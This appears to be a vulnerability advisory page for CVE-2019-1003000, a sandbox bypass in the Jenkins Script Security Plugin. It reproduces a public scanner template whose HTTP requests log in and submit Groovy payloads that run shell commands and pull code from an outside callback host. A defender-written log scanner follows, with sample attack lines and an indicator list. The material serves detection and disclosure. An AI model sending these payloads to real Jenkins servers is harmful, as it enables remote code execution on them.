CVE-2019-1003000: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass

Date: 2025-08-01 | Affected software: Jenkins Script Security Plugin | PoC: public

Vulnerability description

A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.

PoC code [public]

id: CVE-2019-1003000

info:
  name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
  author: sttlr
  severity: high
  description: |
    A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-1003000
    epss-score: 0.94445
    epss-percentile: 0.9999
    cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::*
  reference:
    - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
    - http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
    - https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
    - https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
    - https://github.com/purple-WL/Jenkins_CVE-2019-1003000
    - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
  metadata:
    verified: true
    max-request: 6
    vendor: jenkins
    product: script_security
  tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated

variables:
  username: admin
  vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
  app_name: "{{rand_text_alpha(8)}}"

flow: http(1) && http(2) && (http(3) || http(4))

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "jenkins"
        internal: true
        case-insensitive: true

  - raw:
      - |
        POST /j_acegi_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(tolower(body_2), "jenkins", "/logout")'
        internal: true

  - raw:
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

  - raw:
      - |
        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"
# digest: 4a0a0047304502206dcb98dab324576abb797e15266f36d95adeaa53e3a3990fa34f4e4831ab1c13022100df9943792a88e5b62c2f47d6160bccd628ec69bbb505c226578fb60da9fadecc:922c64590222798bb761d5b6d8e72950
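
A defender-side check, added here and not part of the template or the advisory: it scans constructed Jenkins access-log lines for requests to the two form-validation endpoints the template calls and reports the Groovy constructs found in the submitted `value` parameter. The endpoint paths and constructs are taken from the template; the NCSA-style log format and the sample lines are assumptions.

```python
"""Flag access-log requests shaped like the CVE-2019-1003000 PoC above."""
import re
from urllib.parse import urlsplit, parse_qs

# Form-validation endpoints the template calls (paths from the template).
ENDPOINTS = {
    "sandbox.groovy.SecureGroovyScript/checkScript": "SecureGroovyScript.checkScript",
    "workflow.cps.CpsFlowDefinition/checkScriptCompile": "CpsFlowDefinition.checkScriptCompile",
}
# Constructs the template puts in `value`; a syntax/sandbox check should only
# compile the script, so any of these arriving there deserves a closer look.
INDICATORS = ("@GrabConfig", "@GrabResolver", "@Grab", ".execute(")

# Assumed NCSA-style log: request line in double quotes, client IP first.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_request(target: str):
    """Return (endpoint_label, [indicators]) for a request target, else None."""
    parts = urlsplit(target)
    label = next((v for k, v in ENDPOINTS.items() if k in parts.path), None)
    if label is None:
        return None
    # parse_qs URL-decodes, so %0a/%22/%27 become real newline/quote chars.
    value = parse_qs(parts.query).get("value", [""])[0]
    return label, [ind for ind in INDICATORS if ind in value]


def scan_log(lines):
    """Return (client_ip, endpoint_label, indicators) for each suspicious line."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        result = inspect_request(m.group("target"))
        if result and result[1]:
            findings.append((line.split()[0], result[0], result[1]))
    return findings


# Constructed sample lines (not real traffic); hostnames use .invalid.
SAMPLE_LOG = [
    '10.0.0.5 - admin [01/Aug/2025:10:00:01 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20Abc{public%20Abc(){%22hostname%22.execute()}} HTTP/1.1" 200 12',
    '10.0.0.7 - bob [01/Aug/2025:10:00:02 +0000] "GET /securityRealm/user/bob/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2fexample.invalid%2f%27)%0a@Grab(%27abc.defgh:Abc:1%27)%0aimport%20Abc; HTTP/1.1" 200 12',
    '10.0.0.9 - carol [01/Aug/2025:10:00:03 +0000] "GET /securityRealm/user/carol/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=println%20%22hello%22 HTTP/1.1" 200 12',
    '10.0.0.9 - carol [01/Aug/2025:10:00:04 +0000] "GET /job/build/ HTTP/1.1" 200 1400',
]

if __name__ == "__main__":
    for ip, endpoint, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {endpoint}: {', '.join(hits)}")
```

The third sample line hits a monitored endpoint but carries a harmless script, so it is not reported; only the lines carrying `.execute(` or `@Grab*` annotations are.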
